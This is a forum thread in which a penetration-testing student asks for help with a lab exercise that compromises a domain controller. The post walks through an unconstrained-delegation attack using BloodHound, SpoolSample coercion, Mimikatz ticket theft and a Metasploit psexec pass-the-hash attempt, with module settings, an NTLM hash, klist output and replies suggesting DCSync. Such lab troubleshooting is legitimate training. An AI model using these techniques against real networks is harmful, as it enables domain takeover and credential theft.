LAB 3 - Compromising DC problem (moved from wrong tag)

Hello,

I have encountered troubles with LAB 3. During writing this post I have found the solution to part of exercise (still posted it in case somebody had similar problems) but I have problem with last step of compromising DC. I have probably did something foolish and can’t see mistake. I have started with access to DB-SRV as system and trying to exploit Unconstrained Delegation.
Here is part which is seems to work

First I have confirmed configuration with BloodHound:

I have used Raw query to see only computers

match (c:Computer) return c

Then I have compiled SpoolSample from:

I think that problems might came with compilation process so I will describe what I did with more details.
After opening solution I have made SpoolSample as startup project.

Then switched from debug to release in debugger’s configuration manager.

Then used Clean Solutuion option and rebuild all. Compilation succeded.

I have copied binary from:

C:\Users\__retracted__\PTX\SpoolSample-master\SpoolSample\bin\Release\SpoolSample.exe

to my vmware share. I have also confirmed that binary executes.

Then I have switched to meterpreter session with system privilege and uploaded it to path

C:\Users\Public\Documents\

Then I have executed the attack as described in solutions.

I have read input UNTIL THE END executing channel -r few times and it showed ticket with a bit different output.

Mimikatz part was exactly the same as in solution and I have retrieved hashes as in solution.

PART WHICH IS NOT WORKING:
So I have hash and using psexec as fallows:

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   RHOSTS                10.10.1.3                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
                                                                     etasploit
   RPORT                 445                               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             els.corp                          no        The Windows domain to use for authentication
   SMBPass               8645e87e2593507cf623f3291b1334c2  no        The password for the specified username
   SMBSHARE                                                no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/wri
                                                                     te folder share
   SMBUser               els-admin                         no        The username to authenticate as


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.10.1.3        no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

and got:

msf6 exploit(windows/smb/psexec) > exploit

[*] 10.10.1.3:445 - Connecting to the server...
[*] 10.10.1.3:445 - Authenticating to 10.10.1.3:445|els.corp as user 'els-admin'...
[-] 10.10.1.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.

And here is dead end in terms of solution part. Is it possible to use psexec or should I have go other direction?

UPDATE 1

Here are cached Tickets:

C:\>klist
klist

Current LogonId is 0:0x3e7

Cached Tickets: (3)

#0>	Client: ELS-DC$ @ ELS.CORP
	Server: krbtgt/ELS.CORP @ ELS.CORP
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize 
	Start Time: 10/10/2021 23:41:48 (local)
	End Time:   10/11/2021 9:41:47 (local)
	Renew Time: 10/17/2021 23:41:47 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 

#1>	Client: ELS-DC$ @ ELS.CORP
	Server: ldap/eLS-DC.els.corp @ ELS.CORP
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize 
	Start Time: 10/11/2021 2:05:43 (local)
	End Time:   10/11/2021 9:41:47 (local)
	Renew Time: 10/17/2021 23:41:47 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0 
	Kdc Called: eLS-DC.els.corp

#2>	Client: ELS-DC$ @ ELS.CORP
	Server: ldap/eLS-DC.els.corp/els.corp @ ELS.CORP
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize 
	Start Time: 10/11/2021 2:04:26 (local)
	End Time:   10/11/2021 9:41:47 (local)
	Renew Time: 10/17/2021 23:41:47 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0 
	Kdc Called: eLS-DC.els.corp

I have tried to ls dc c drive and got access denied:

C:\>dir \\ELS-DC\C$
dir \\ELS-DC\C$
Access is denied.

C:\>

PS.
I have made screenshots but they gone due to “New user” policy.

Did you get constrained delegation to work in Lab #2? This seems very similar issue to what I am having and posted in this forum.

so I figured my issue out and I bet yours is the same. Since you have the tickets using the FQDN then when you access the have to use the FQDN. Try this command:

dir \\eLS-DC.els.corp\C$

or maybe not. I don’t see a ticket for CIFS either but maybe with the krbtgt ticket you don’t need one. Just pulling at straws. Maybe you can DCSync with the krbtgt and ldap? then use the Admin hash to generate a ticket. Or might it be possible to get a TGT for domain admin?